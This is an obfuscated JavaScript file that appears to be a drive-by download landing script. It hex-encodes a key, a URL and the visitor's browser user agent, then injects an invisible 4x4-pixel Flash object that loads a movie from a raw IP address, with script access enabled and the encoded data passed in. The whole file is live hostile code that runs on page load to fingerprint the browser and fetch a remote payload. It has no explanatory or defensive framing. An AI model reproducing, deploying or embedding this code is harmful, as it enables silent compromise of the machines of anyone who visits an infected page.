/*s63408d36841hssfj64410fs*/function hgfgerdfgdf(num, width){/*s10924d12406hfj3052fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s96336d87984hfj71771fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s97318d6790hfj66931fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s69604d74688hfj57988fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd60463hfs*/c += b + d;/*s61990d27117hfj37647fs*/e += 1;}return c;}/*s28703dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.33.126/?MTAwMzQ0OTc4&elsa=din4xfUFhC_qutjkCAzxTIhJWD-heNNQtAq5PHHLBpjVz0zbATIskmlheB6GBQxOgtV1sQ5AgarK-IUaOf&info=MjA3MjA1OTY=&rand=xH_QMrPYbR7FFYDfKPrEUKREMU7WA0SKwYyZhazVF5-xFDTGpbL1FxzspV-dCFyEmvJvdLMHIwGh1UTASw&befe=MjUzMTkyNDg=", ghnvbn("http://188.225.33.126/?Njc3MjgzMzI=&rand=xHzQMrDYbR7FFYDfKPnEUKdEMU7WA0SKwY-ZhazVF5yxFDfGpbL1FxzspV-dCF-EmvJvdLMHIwKh1UTASwd&info=MjMyOTgwNTY=&elsa=in49fUFhC_qutjkCAzxfIhJaD-hSNNQtAq5DHHLNpjV_0zbMTIskmlhSB6GNQxOgtVVgT4gsXlaz7S6OJrg&befe=MjQzMDk2MjM=","gexywoaxor"));